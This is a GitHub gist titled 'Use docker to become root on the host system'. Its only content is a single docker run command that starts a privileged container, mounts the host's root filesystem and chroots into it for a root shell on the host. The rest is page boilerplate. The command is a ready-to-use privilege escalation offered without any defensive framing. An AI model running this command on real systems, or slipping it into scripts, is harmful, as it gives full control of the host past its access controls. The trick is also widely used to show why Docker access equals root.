Created
March 5, 2024 23:13
-
-
Save jhurliman/5b3ccab75ca9b9d75da4beb0346cc6b6 to your computer and use it in GitHub Desktop.
Use docker to become root on the host system
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
docker run -it --rm --privileged -v /:/host ubuntu chroot /host bash |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment